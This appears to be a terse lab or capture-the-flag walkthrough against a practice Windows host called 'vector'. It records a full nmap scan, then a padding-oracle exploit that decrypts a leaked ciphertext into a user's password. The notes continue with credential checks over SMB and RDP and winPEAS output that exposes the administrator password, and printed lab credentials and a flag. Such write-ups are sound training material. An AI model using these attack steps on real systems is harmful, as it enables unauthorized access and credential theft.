$ sudo nmap -sCV -p- -v -Pn --open 192.168.190.119 > vector.txt
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2290/tcp open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: c
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-07-07T01:47:41+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=vector
| Issuer: commonName=vector
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-07-06T01:44:29
| Not valid after:  2027-01-05T01:44:29
| MD5:     f21a 455c a8c1 23a2 3d39 b568 82a5 999f
| SHA-1:   b3f9 3cfd 0941 76bd 9761 56ed 66b9 b4ca 1211 6a3e
|_SHA-256: 9166 f3cc 74bf 1928 971d a4e9 ed25 b0cb 5579 7e16 d41e 245f e786 e267 dbd4 4ecc
| rdp-ntlm-info: 
|   Target_Name: VECTOR
|   NetBIOS_Domain_Name: VECTOR
|   NetBIOS_Computer_Name: VECTOR
|   DNS_Domain_Name: vector
|   DNS_Computer_Name: vector
|   Product_Version: 10.0.17763
|_  System_Time: 2026-07-07T01:47:02+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2026-07-07T01:47:06
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

$ curl http://192.168.190.119:2290 -v
<!--
		AES-256-CBC-PKCS7 ciphertext: 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488
		
		Victor's TODO: Need to add authentication eventually..
	-->


1
# https://pulsesecurity.co.nz/articles/dotnet-padding-oracles
# https://github.com/mpgn/Padding-oracle-attack

$ python exploit.py -u /?c= -c "4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488" -l 16 --host 192.168.190.119:2290 --error '<span id="MyLabel">0</span>'
[+] Search value block :  1

[+] Decrypted value (ASCII): WormAloeVat7

Victor:WormAloeVat7

$ nxc smb 192.168.190.119 -u victor -p WormAloeVat7
SMB         192.168.190.119 445    VECTOR           [+] vector\victor:WormAloeVat7

$ xfreerdp3 /u:'victor' /p:'WormAloeVat7' /v:192.168.190.119 /cert:ignore /dynamic-resolution /floatbar

winPEASany.exe
   User Id         :        S-1-5-21-3563147999-1482670063-239359831-500
   Event Id        :        4104
   Context         :        Write-Host "Setting Passwords"
if (Test-Path ".\tmp.txt") {
# tmp.txt is created just before reboot
net user administrator EverywayLabelWrap375
Write-Host "Creating Flags"
New-Item "C:\Users\Administrator\Desktop\proof.txt"
Set-Content "C:\Users\Administrator\Desktop\proof.txt" "b127616b1827908e3ce2b51ebd8fe5ff"
   Created At      :        7/21/2020 10:15:32 AM
   Command line    :        net user administrator EverywayLabelWrap375

administrator:EverywayLabelWrap375

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
vector\administrator
